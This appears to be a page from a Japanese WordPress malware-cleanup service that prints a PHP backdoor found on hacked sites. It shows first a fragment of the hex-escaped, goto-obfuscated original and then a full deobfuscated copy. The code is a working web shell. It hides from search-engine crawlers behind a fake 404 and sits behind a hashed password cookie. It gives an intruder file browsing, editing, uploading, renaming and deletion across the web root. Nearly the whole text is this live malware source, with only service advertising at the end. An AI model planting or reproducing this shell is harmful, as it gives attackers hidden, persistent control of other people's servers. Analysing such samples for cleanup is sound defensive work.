"\x22\x3e\x3c\x62\x75\x74\x74\157\x6e\40\143\x6c\x61\x73\x73\x3d\42\x62\x74\156\x20\x62\x74\156\x2d\x64\141\x72\x6b\x22\40\164\171\x70\145\75\42\142\x75\164\x74\157\x6e\42\x3e\46\x23\61\71\71\67\x38\x3b\46\43\x32\x30\62\65\x36\x3b\x3c\x2f\x62\x75\x74\164\157\156\x3e\x3c\x2f\x61\x3e\12\46\156\x62\x73\x70\x3b\xa\x3c\57\x64\151\x76\76\12\x3c\57\x6e\x61\166\x3e"; goto mSsBx; TEliQ: goto DEhzR; goto nmE71; DSNxX: D3gQ9: goto CpRpc; I_ZvX: if (!isset($_POST["\x72\145\156\141\x6d\145"])) { goto Z0fki; } goto DPUpR; GPvES: if (!($_COOKIE["\160\167\137\156\x61\x6d\145\137\x32\x33\62\65\66"] == $Xk5Xh)) { goto qC5D0; } goto P3q8f; PoptX: setcookie("\160\x77\x5f\156\141\x6d\x65\137\x32\63\x32\x35\66", $_POST["\160\x77\137\156\x61\x6d\145\x5f\62\63\x32\65\x36"]); goto tTCz7; d2Fv2: echo "\x3c\x73\x63\162\x69\x70\x74\x3e\x61\x6c\x65\x72\164\x28\x27\123\x61\166\x65\144\56\x27\x29\x3b\40\x77\151\156\144\157\x77\56\154\x6f\x63\141\x74\x69\x6f\156\56\x72\145\160\154\141\x63\x65\50\x27\x3f\x70\x3d" . S9xw9(eokD2) . "\47\x29\73\x3c\x2f\x73\143\162\151\160\164\76"; goto VgIJy; i2YkM: DuGji: goto vaN6s; hfxt0: if (fwrite($dZxAG, $ooUvf)) { goto kufEa; } goto vkOs4; XYaP2: if (!isset($_POST["\160\167\x5f\x6e\x61\155\145\x5f\x32\63\62\65\66"])) { goto WaPZf; } goto MTDZJ; rws5k: $Fc6gH = array(); goto KUmjD; coFs5: if (rmdir($Bt599) == true) { goto s2INy; } goto Pv3c_; hfaBt: if (is_dir(sPpvI($_GET["\x71"]))) { goto i0wJY; } goto TEliQ; wWxPW: SH5bA: goto aI6zB; DlXfG: ONSTW: goto tkvj4; TiJUc: DEhzR: goto OzywD; mSsBx: if (isset($_GET["\160"])) { goto ED2Dh; } goto vfjCZ; HunOf: F83W3: goto eoKl1; JDuQ1: if (unlink($Bt599)) { goto HYQRt; } goto JpO7P; nmE71: DpCwx: goto AbXwl; M7HfI: goto LNGSj; goto TA8eH; w_eSo: $Bt599 = eokD2 . "\57" . $_GET["\144"]; goto ODBm1; laYhq: pmLOP: goto KaKGV; fLQW9: if (!isset($_GET["\145"])) { goto XGl2y; } goto gjxYx; LV6pa: $zd1N7 = eokD2 . "\x2f" . $_FILES["\146\x69\154\145\124\157\x55\160\x6c\157\x61\x64"]["\x6e\141\155\145"]; goto SmUQb; Wxx6v: if (!isset($_POST["\145\144\x69\164"])) { goto ONSTW; } goto ssRos; n8zDB: echo "\x3c\x70\x3e\123\x6f\x72\x72\x79\x2c\40\164\x68\145\x72\x65\40\167\141\163\40\x61\x6e\x20\145\162\162\157\162\40\165\x70\154\x6f\x61\x64\x69\x6e\147\40\x79\x6f\165\x72\40\x66\x69\x6c\145\56\74\x2f\160\76"; goto UrrkK; d3qr6: $GaQzd = $Qpc5n; goto q08Ts; EjNV3: goto wylwX; goto ivdaZ; LeqLB: function Bw7en($nv4MC) { goto vieki; iIF2C: goto Ztolv; goto GR4Kf; wNM6U: return "\x3c\x69\x20\x63\154\x61\163\163\75\42\146\x61\55\x62\x72\141\156\x64\x73\40\146\x61\x2d\x70\150\160\x22\76\74\x2f\151\x3e\x20"; goto yapsm; N4c7e: return "\x3c\151\40\x63\x6c\x61\x73\x73\x3d\x22\146\141\x2d\163\x6f\x6c\x69\144\x20\x66\x61\55\150\141\x6d\x6d\145\x72\42\76\x3c\57\151\x3e\40"; goto JphkI; axC2C: $HIkXu = array("\167\141\166", "\x6d\x34\x61", "\x6d\x34\142", "\x6d\x70\x33", "\x6f\x67\147", "\x77\145\142\x6d", "\x6d\x70\x63"); goto BN2EI; cRz44: if (in_array($i2xp9, $HIkXu)) { goto W3VyL; } goto ft7V4; g8sVC: goto Ztolv; goto EDHOW; paY4Q: return "\74\151\x20\x63\154\141\163\x73\x3d\x22\146\x61\55\x62\x72\141\156\x64\x73\x20\x66\x61\55\x63\x73\163\x33\42\76\x3c\57\151\x3e\40"; goto aUwEg; BcPjF: return "\74\151\x20\143\x6c\141\163\163\x3d\x22\x66\141\x2d\x73\x6f\154\151\x64\40\x66\141\55\146\151\154\145\x22\76\x3c\x2f\x69\76\40"; goto sHOKB; yJSUk: D8Y3U: goto sa2l6; UppSe: if ($i2xp9 == "\150\164\155\154" || $i2xp9 == "\150\x74\155") { goto VG1tQ; } goto KgRP8; JuiD3: if ($nv4MC == "\x2e\x68\x74\x61\x63\143\145\163\163") { goto kQDZv; } goto RqOMn; BE389: if ($i2xp9 == "\164\x78\x74") { goto fXiNV; } goto cRz44; BXNnZ: J8ZAA: goto XdFnt; nyb9P: return "\x3c\151\x20\143\x6c\x61\163\163\75\42\x66\x61\55\x72\145\147\165\154\141\162\40\x66\x61\55\146\x69\x6c\x65\x2d\x6c\x69\156\x65\163\42\76\74\x2f\x69\x3e\x20"; goto iIF2C; vWt1J: return "\x3c\151\x20\x63\154\141\163\x73\75\42\x66\x61\x2d\x73\x68\x61\162\160\x20\146\x61\55\163\157\x6c\x69\144\40\x66\x61\55\142\x75\x67\x22\x3e\74\x2f\x69\76\40"; goto yHWnG; u_wlM: goto Ztolv; goto BXNnZ; vqy0f: goto Ztolv; goto yJSUk; W5U0P: if ($nv4MC == "\145\162\x72\x6f\162\137\x6c\x6f\x67") { goto eVKee; } goto JuiD3; yCcDd: if ($i2xp9 == "\152\x73") { goto D8Y3U; } goto BcPjF; UIt4J: eVKee: goto vWt1J; ft7V4: if ($i2xp9 == "\160\x79") { goto J8ZAA; } goto yCcDd; EDHOW: feI0W: goto wNM6U; f_Cld: kQDZv: goto N4c7e; aUwEg: goto Ztolv; goto E2kl_; V6bPv: if ($i2xp9 == "\x63\163\x73") { goto u6xIx; } goto BE389; yHWnG: goto wT9pA; goto f_Cld; JphkI: wT9pA: goto UppSe; yapsm: goto Ztolv; goto WKKLh; RqOMn: goto wT9pA; goto UIt4J; WKKLh: oIGma: goto leOiI; s34I8: return "\x3c\x69\40\143\x6c\141\x73\163\75\x22\x66\141\55\142\162\x61\156\x64\x73\40\146\x61\x2d\150\x74\x6d\x6c\65\42\76\74\57\x69\x3e\40"; goto g8sVC; W3ZcK: Ztolv: goto IJn6k; GR4Kf: W3VyL: goto aN1xO; TBlRU: if (in_array($i2xp9, $Zv5VM)) { goto oIGma; } goto V6bPv; BN2EI: $i2xp9 = strtolower(hPnh2($nv4MC)); goto W5U0P; aN1xO: return "\74\151\x20\x63\x6c\x61\x73\x73\x3d\42\146\141\x2d\x64\x75\157\x74\157\x6e\145\x20\x66\141\55\146\151\x6c\x65\x2d\x6d\x75\163\151\x63\x22\76\74\57\151\x3e\x20"; goto u_wlM; XdFnt: return "\x3c\151\40\143\154\x61\163\163\x3d\42\x66\x61\x2d\x62\x72\141\x6e\x64\x73\40\146\x61\x2d\160\x79\x74\x68\x6f\156\42\x3e\x3c\57\151\x3e\x20"; goto vqy0f; leOiI: return "\x3c\151\x20\143\x6c\x61\x73\x73\x3d\42\146\141\x2d\162\x65\147\x75\154\141\162\40\x66\141\x2d\151\155\x61\147\x65\x73\42\76\74\57\x69\x3e\40"; goto mhqV3; apH_E: u6xIx: goto paY4Q; sa2l6: return "\74\x69\x20\x63\154\141\x73\x73\x3d\42\x66\x61\x2d\x62\162\x61\x6e\144\163\x20\146\x61\x2d\x6a\163\42\x3e\x3c\57\151\x3e\40"; goto W3ZcK; KgRP8: if ($i2xp9 == "\160\150\160" || $i2xp9 == "\160\x68\164\155\154") { goto feI0W; } goto TBlRU; sHOKB: goto Ztolv; goto SztDk; SztDk: VG1tQ: goto s34I8; vieki: $Zv5VM = array("\141\160\x6e\147", "\141\x76\x69\x66", "\147\x69\x66", "\152\160\147", "\152\x70\145\147", "\x6a\146\151\146", "\160\x6a\x70\x65\x67", "\160\x6a\x70", "\160\156\147", "\x73\166\x67", "\x77\x65\142\x70"); goto axC2C; E2kl_: fXiNV: goto nyb9P; mhqV3: goto Ztolv; goto apH_E; IJn6k: } goto woMvi; lPKe5: if (isset($_COOKIE["\x70\x77\x5f\x6e\141\x6d\145\x5f\62\63\x32\65\x36"])) { goto tlCgw; } goto XYaP2; YDUQI: QbsVP: goto ustyO; ZJIq1: if (isset($_GET["\160"])) { goto F83W3; } goto AomsW; MSYzA: goto gLSLJ; goto nBMLM; Pv3c_: echo "\x3c\x73\143\x72\151\160\164\76\x61\154\x65\x72\x74\50\47\x53\x6f\x6d\x65\x20\x65\x72\162\x6f\162\40\157\143\x63\x75\162\x72\145\144\x2e\47\51\73\x20\x77\x69\156\x64\x6f\167\56\x6c\x6f\143\141\x74\x69\x6f\x6e\56\x72\145\x70\x6c\x61\143\145\x28\47\77\160\75" . S9XW9(eokD2) . "\47\x29\x3b\x3c\57\x73\x63\x72\x69\x70\164\x3e"; goto rzTmK; ETo_N: goto Otijt; goto Hkssa; Uba7R: Otijt: goto Dad2A; PypQh: echo "\xa\74\x74\x61\x62\x6c\x65\x20\x63\154\141\x73\x73\75\x22\164\141\142\154\x65\x20\x74\x61\x62\154\x65\55\x68\157\166\145\x72\x22\76\12\x20\40\74\164\x68\x65\141\144\76\12\40\x20\x20\40\74\164\162\76\12\40\x20\40\x20\x20\x20\74\164\150\40\163\x63\157\160\145\x3d\42\143\157\x6c\42\76\46\x23\62\x31\x35\61\67\73\x26\x23\63\61\x32\61\66\73\x3c\57\164\x68\76\12\40\x20\40\x20\40\40\74\164\150\40\163\x63\157\160\x65\75\42\143\x6f\154\x22\76\x26\43\62\x32\x38\62\63\x3b\46\43\x32\x33\65\x36\67\73\x3c\x2f\x74\x68\x3e\12\x20\40\x20\x20\40\x20\74\164\x68\x20\x73\143\157\160\x65\75\42\143\157\x6c\x22\x3e\x26\43\62\x36\61\x30\62\x3b\x26\x23\63\70\63\70\x38\x3b\74\57\164\150\76\xa\x20\x20\x20\40\x20\40\x3c\x74\x68\40\163\x63\157\x70\145\x3d\42\143\x6f\x6c\42\76\x26\43\x32\x36\64\63\x35\73\x26\x23\63\70\x34\x38\60\x3b\74\57\164\150\76\12\40\x20\40\x20\40\x20\74\164\x68\40\x73\143\x6f\x70\145\x3d\x22\x63\x6f\154\x22\x3e\x26\43\x32\x35\x38\x30\65\73\46\x23\62\x30\63\x31\x36\73\x3c\x2f\x74\150\76\xa\40\x20\40\40\x3c\x2f\x74\x72\x3e\xa\40\x20\74\57\x74\x68\x65\141\x64\76\12\40\40\74\x74\x62\157\144\x79\76\xa"; goto D0MOO; mMwwh: P1MGl: goto ddHhl; m5Mkg: echo "\74\163\x63\162\151\160\164\x3e\141\154\145\162\164\50\x27\x52\145\156\x61\155\145\x64\56\47\x29\x3b\40\x77\x69\x6e\x64\157\x77\56\x6c\157\143\141\164\x69\157\x6e\56\162\x65\160\154\141\143\145\50\x27\x3f\x70\x3d" . S9xw9(eokD2) . "\x27\x29\x3b\x3c\x2f\x73\x63\x72\x69\160\164\x3e"; goto DSNxX; JiOgE: Xsluc: goto clSWz; UrrkK: goto htbaw; goto Pf9oq; P2bxM: die("\74\146\x6f\x72\x6d\x20\141\143\x74\x69\157\x6e\75\47\77\160\x3d\47\x20\x6d\145\x74\x68\x6f\x64\x3d\160\x6f\163\164\x20\76\x3c\x69\x6e\160\165\x74\x20\164\x79\160\145\75\x70\141\x73\163\x77\x6f\162\144\40\x6e\141\155\x65\75\x27\160\167\x5f\x6e\x61\x6d\x65\137\62\63\x32\x35\x36\x27\x20\166\141\x6c\165\145\x3d\47" . $_GET["\x70\167"] . "\x27\x20\x20\x72\145\x71\165\151\x72\145\144\x3e\x3c\151\156\160\165\164\40\164\171\x70\x65\x3d\x73\x75\x62\155\151\x74\40\156\x61\155\145\x3d\47\x77\141\164\143\x68\x69\156\147\x27\40\76\x3c\57\146\x6f\x72\x6d\x3e"); goto gHmQg; qzE2V: echo "\74\x70\76" . htmlspecialchars(basename($_FILES["\x66\x69\154\x65\124\157\x55\160\x6c\157\141\144"]["\x6e\x61\155\x65"])) . "\x20\x68\141\163\40\x62\x65\145\156\x20\165\x70\154\x6f\141\144\145\144\x2e\x3c\57\160\x3e"; goto OkFQi; WS7Aa: qC5D0: goto jM6M3; gjxYx: if (!(!empty($_GET["\x65"]) && isset($_GET["\x71"]))) { goto SfX3W; } goto Ci3r1; Hkssa: TRg3V: goto lc5CJ; gHmQg: AnVxG: goto Tg5yZ; WI68M: i0wJY: goto ZRsMa; aI6zB: echo "\xa\12\x3c\163\143\162\151\x70\164\x20\x73\162\143\75\x22\150\x74\x74\x70\163\x3a\x2f\x2f\x63\x64\156\x2e\x6a\163\x64\x65\154\x69\166\162\56\156\145\164\57\156\160\x6d\x2f\x62\x6f\157\164\163\164\162\141\160\100\65\x2e\63\56\x30\x2d\141\x6c\160\150\141\x31\57\144\151\x73\164\x2f\x6a\x73\x2f\x62\157\157\x74\x73\164\162\141\160\56\x62\165\x6e\144\154\x65\x2e\x6d\x69\156\x2e\152\163\42\xa\x20\40\x20\40\x20\x20\40\x20\151\156\164\x65\147\x72\x69\x74\x79\75\x22\x73\x68\141\63\70\64\55\x77\67\x36\x41\161\x50\x66\104\x6b\115\x42\104\130\x6f\63\x30\152\x53\x31\123\x67\x65\172\66\x70\x72\x33\170\x35\x4d\154\x51\x31\x5a\101\107\103\x2b\156\x75\132\102\53\x45\131\x64\147\x52\132\147\x69\x77\170\x68\124\x42\124\x6b\106\67\103\130\166\116\42\12\x20\40\x20\40\x20\40\40\40\x63\162\157\163\x73\x6f\x72\151\x67\151\x6e\x3d\x22\x61\156\157\x6e\171\x6d\x6f\165\163\x22\76\74\x2f\163\x63\162\x69\160\x74\x3e\12\74\57\x62\157\x64\x79\76\12\74\57\150\x74\x6d\154\76\12\xa";
?><?php
error_reporting(0);
http_response_code(404);
$Xk5Xh = "82dd45acf86a156f7b27ff8cf175dcb0";
if (empty($_SERVER["HTTP_USER_AGENT"])) {
goto QbsVP;
}
$yNQ9q = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if (!preg_match("/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i", $_SERVER["HTTP_USER_AGENT"])) {
QbsVP:
$ptrI3 = false;
if (isset($_COOKIE["pw_name_23256"])) {
if (!($_COOKIE["pw_name_23256"] == $Xk5Xh)) {
goto qC5D0;
}
$ptrI3 = true;
qC5D0:
goto jM6M3;
}
if (!isset($_POST["pw_name_23256"])) {
goto WaPZf;
}
if (!($_POST["pw_name_23256"] == $Xk5Xh)) {
goto DuGji;
}
setcookie("pw_name_23256", $_POST["pw_name_23256"]);
$ptrI3 = true;
DuGji:
WaPZf:
jM6M3:
if ($ptrI3) {
echo "\n<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <link href=\"https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css\" rel=\"stylesheet\"\n integrity=\"sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD\" crossorigin=\"anonymous\">\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css\"\n integrity=\"sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==\"\n crossorigin=\"anonymous\" referrerpolicy=\"no-referrer\" />\n</head>\n<body style=\" width: 60%; margin: 0 auto;\">\n";
function hXSp5($yo0qu)
{
if ($yo0qu >= 1073741824) {
$yo0qu = number_format($yo0qu / 1073741824, 2) . " GB";
goto UF0uz;
}
if ($yo0qu >= 1048576) {
$yo0qu = number_format($yo0qu / 1048576, 2) . " MB";
goto UF0uz;
}
if ($yo0qu >= 1024) {
$yo0qu = number_format($yo0qu / 1024, 2) . " KB";
goto UF0uz;
}
if ($yo0qu > 1) {
$yo0qu .= " bytes";
goto UF0uz;
}
if ($yo0qu == 1) {
$yo0qu .= " byte";
goto JQcW5;
}
$yo0qu = "0 bytes";
JQcW5:
UF0uz:
return $yo0qu;
}
function hpNH2($nv4MC)
{
return substr(strrchr($nv4MC, "."), 1);
}
function Bw7en($nv4MC)
{
$Zv5VM = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp");
$HIkXu = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc");
$i2xp9 = strtolower(hPnh2($nv4MC));
if ($nv4MC == "error_log") {
return "<i class=\"fa-sharp fa-solid fa-bug\"></i> ";
}
if ($nv4MC == ".htaccess") {
return "<i class=\"fa-solid fa-hammer\"></i> ";
}
wT9pA:
if ($i2xp9 == "html" || $i2xp9 == "htm") {
return "<i class=\"fa-brands fa-html5\"></i> ";
}
if ($i2xp9 == "php" || $i2xp9 == "phtml") {
return "<i class=\"fa-brands fa-php\"></i> ";
}
if (in_array($i2xp9, $Zv5VM)) {
return "<i class=\"fa-regular fa-images\"></i> ";
}
if ($i2xp9 == "css") {
return "<i class=\"fa-brands fa-css3\"></i> ";
}
if ($i2xp9 == "txt") {
return "<i class=\"fa-regular fa-file-lines\"></i> ";
}
if (in_array($i2xp9, $HIkXu)) {
return "<i class=\"fa-duotone fa-file-music\"></i> ";
}
if ($i2xp9 == "py") {
return "<i class=\"fa-brands fa-python\"></i> ";
}
if ($i2xp9 == "js") {
return "<i class=\"fa-brands fa-js\"></i> ";
}
return "<i class=\"fa-solid fa-file\"></i> ";
}
function s9xW9($M2lYd)
{
$qeMmT = array("/", "\\", ".", ":");
$ZbfTG = array("ক", "খ", "গ", "ঘ");
return str_replace($qeMmT, $ZbfTG, $M2lYd);
}
function sPPVI($M2lYd)
{
$qeMmT = array("/", "\\", ".", ":");
$ZbfTG = array("ক", "খ", "গ", "ঘ");
return str_replace($ZbfTG, $qeMmT, $M2lYd);
}
$Qpc5n = "/var/www/html";
if (isset($_GET["p"])) {
if (empty($_GET["p"])) {
$GaQzd = $Qpc5n;
goto Otijt;
}
if (!is_dir(sPPvi($_GET["p"]))) {
echo "<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>";
goto Otijt;
}
if (is_dir(SPpVi($_GET["p"]))) {
$GaQzd = sppVi($_GET["p"]);
goto Uba7R;
}
Uba7R:
Otijt:
goto lMJdE;
}
if (isset($_GET["q"])) {
if (!is_dir(sPPVi($_GET["q"]))) {
echo "<script>window.location.replace('?p=');</script>";
goto DEhzR;
}
if (is_dir(sPpvI($_GET["q"]))) {
$GaQzd = Sppvi($_GET["q"]);
goto TiJUc;
}
TiJUc:
DEhzR:
goto OzywD;
}
$GaQzd = $Qpc5n;
OzywD:
lMJdE:
define("eokD2", $GaQzd);
echo "\n<nav class=\"navbar navbar-light\" style=\"background-color: #e3f2fd;\">\n <div class=\"navbar-brand\">\n <a href=\"?\"><img src=\"https://github.com/fluidicon.png\" width=\"30\" height=\"30\" alt=\"\"></a>\n";
$M2lYd = "eokD2";
$y0dv9 = array(0 => "eokD2");
foreach ($y0dv9 as $gHWBR => $YxYOs) {
if (!($YxYOs == '' && $gHWBR == 0)) {
if (!($YxYOs == '')) {
echo "<a href='?p=";
$cuBaN = 0;
s19DA:
if (!($cuBaN <= $gHWBR)) {
echo "'>" . $YxYOs . "</a>/";
goto Fgru4;
}
echo str_replace(":", "ঘ", $y0dv9[$cuBaN]);
if (!($cuBaN != $gHWBR)) {
goto puvRJ;
}
echo "ক";
puvRJ:
$cuBaN++;
goto s19DA;
}
goto TeDto;
}
$qeMmT = true;
echo "<a href=\"?p=/\">/</a>";
Fgru4:
TeDto:
}
echo "\n</div>\n<div class=\"form-inline\">\n<a href=\"?upload&q=" . urlencode(s9Xw9(eokD2)) . "\"><button class=\"btn btn-dark\" type=\"button\">上传</button></a>\n \n</div>\n</nav>";
if (isset($_GET["p"])) {
if (!is_readable(eokD2)) {
goto w2egY;
}
$IWnez = scandir(eokD2);
$Fc6gH = array();
$zqNP4 = array();
foreach ($IWnez as $KN6jg) {
if (!($KN6jg == "." || $KN6jg == "..")) {
$km7u_ = "eokD2/" . $KN6jg;
if (is_dir($km7u_)) {
array_push($Fc6gH, $KN6jg);
goto ZxCSO;
}
if (is_file($km7u_)) {
array_push($zqNP4, $KN6jg);
goto J0tTi;
}
J0tTi:
ZxCSO:
goto FRDUM;
}
FRDUM:
}
w2egY:
echo "\n<table class=\"table table-hover\">\n <thead>\n <tr>\n <th scope=\"col\">名称</th>\n <th scope=\"col\">大小</th>\n <th scope=\"col\">时间</th>\n <th scope=\"col\">权限</th>\n <th scope=\"col\">操作</th>\n </tr>\n </thead>\n <tbody>\n";
foreach ($Fc6gH as $yLMfK) {
echo " <tr>\n <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(S9xw9("eokD2/" . $yLMfK)) . "'>" . $yLMfK . "</a></td>\n <td><b>---</b></td>\n <td>" . date("Y-m-d H:i:s", filemtime("eokD2/" . $yLMfK)) . "</td>\n <td>0" . substr(decoct(fileperms("eokD2/" . $yLMfK)), 3) . "</a></td>\n <td>\n <a title='重新命名' href='?q=" . urlencode(s9xw9(eokD2)) . "&r=" . $yLMfK . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>\n <a title='删除' href='?q=" . urlencode(S9xW9(eokD2)) . "&d=" . $yLMfK . "'><i class='fa fa-trash' aria-hidden='true'></i></a>\n <td>\n </tr>\n";
}
foreach ($zqNP4 as $nv4MC) {
echo " <tr>\n <td><a style='text-decoration: none;' title='编辑' href='?q=" . urlencode(S9xw9(eokD2)) . "&e=" . $nv4MC . "'>" . bW7eN($nv4MC) . $nv4MC . "</a></td>\n <td>" . HxsP5(filesize("eokD2/" . $nv4MC)) . "</td>\n <td>" . date("Y-m-d H:i:s", filemtime("eokD2/" . $nv4MC)) . "</td>\n <td>0" . substr(decoct(fileperms("eokD2/" . $nv4MC)), 3) . "</a></td>\n <td>\n <a title='编辑' href='?q=" . urlencode(S9xW9(eokD2)) . "&e=" . $nv4MC . "'><i class='fa-solid fa-file-pen'></i></a>\n <a title='重新命名' href='?q=" . urlencode(s9XW9(eokD2)) . "&r=" . $nv4MC . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>\n <a title='删除' href='?q=" . urlencode(s9Xw9(eokD2)) . "&d=" . $nv4MC . "'><i class='fa fa-trash' aria-hidden='true'></i></a>\n <td>\n </tr>\n";
}
echo " </tbody>\n</table>";
goto bdVve;
}
if (!empty($_GET)) {
goto qQCcU;
}
echo "<script>window.location.replace('?p=');</script>";
qQCcU:
bdVve:
if (!isset($_GET["upload"])) {
goto Lce1o;
}
echo "\n <form method=\"post\" enctype=\"multipart/form-data\">\n 选择文件:\n <input type=\"file\" name=\"fileToUpload\" id=\"fileToUpload\">\n <input type=\"submit\" class=\"btn btn-dark\" name=\"upload\">\n </form>";
Lce1o:
if (!isset($_GET["r"])) {
goto GJZNJ;
}
if (!(!empty($_GET["r"]) && isset($_GET["q"]))) {
goto MsZNa;
}
echo "\n <form method=\"post\">\n 重新命名:\n <input type=\"text\" name=\"name\" value=\"" . $_GET["r"] . "\">\n <input type=\"submit\" class=\"btn btn-dark\" name=\"rename\">\n </form>";
if (!isset($_POST["rename"])) {
goto Z0fki;
}
$Bt599 = "eokD2/" . $_GET["r"];
if (rename($Bt599, "eokD2/" . $_POST["name"])) {
echo "<script>alert('Renamed.'); window.location.replace('?p=" . S9xw9(eokD2) . "');</script>";
goto DSNxX;
}
echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . S9xW9(eokD2) . "');</script>";
DSNxX:
Z0fki:
MsZNa:
GJZNJ:
if (!isset($_GET["e"])) {
goto XGl2y;
}
if (!(!empty($_GET["e"]) && isset($_GET["q"]))) {
goto SfX3W;
}
echo "\n <form method=\"post\">\n <textarea style=\"height: 500px;\n width: 100%;\" name=\"data\">" . htmlspecialchars(file_get_contents("eokD2/" . $_GET["e"])) . "</textarea>\n <br>\n <input type=\"submit\" class=\"btn btn-dark\" name=\"edit\">\n </form>";
if (!isset($_POST["edit"])) {
goto ONSTW;
}
$fGoW4 = "eokD2/" . $_GET["e"];
$ooUvf = $_POST["data"];
$dZxAG = fopen($fGoW4, "w");
if (fwrite($dZxAG, $ooUvf)) {
echo "<script>alert('Saved.'); window.location.replace('?p=" . S9xw9(eokD2) . "');</script>";
goto VgIJy;
}
echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . S9xw9(eokD2) . "');</script>";
VgIJy:
fclose($dZxAG);
ONSTW:
SfX3W:
XGl2y:
if (!isset($_POST["upload"])) {
goto teZGR;
}
$zd1N7 = "eokD2/" . $_FILES["fileToUpload"]["name"];
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $zd1N7)) {
echo "<p>" . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>";
goto OkFQi;
}
echo "<p>Sorry, there was an error uploading your file.</p>";
OkFQi:
teZGR:
if (!(isset($_GET["d"]) && isset($_GET["q"]))) {
goto SH5bA;
}
$Bt599 = "eokD2/" . $_GET["d"];
if (is_file($Bt599)) {
if (unlink($Bt599)) {
echo "<script>alert('File removed.'); window.location.replace('?p=" . S9XW9(eokD2) . "');</script>";
goto VvqJS;
}
echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . S9xw9(eokD2) . "');</script>";
VvqJS:
goto gLSLJ;
}
if (is_dir($Bt599)) {
if (rmdir($Bt599) == true) {
echo "<script>alert('Directory removed.'); window.location.replace('?p=" . S9Xw9(eokD2) . "');</script>";
goto mMwwh;
}
echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . S9XW9(eokD2) . "');</script>";
mMwwh:
goto ddHhl;
}
ddHhl:
gLSLJ:
SH5bA:
echo "\n\n<script src=\"https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js\"\n integrity=\"sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN\"\n crossorigin=\"anonymous\"></script>\n</body>\n</html>\n\n";
// [PHPDeobfuscator] Implied script end
return;
}
die("<form action='?p=' method=post ><input type=password name='pw_name_23256' value='" . $_GET["pw"] . "' required><input type=submit name='watching' ></form>");
}
header("HTTP/1.0 404 Not Found");
exit;■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.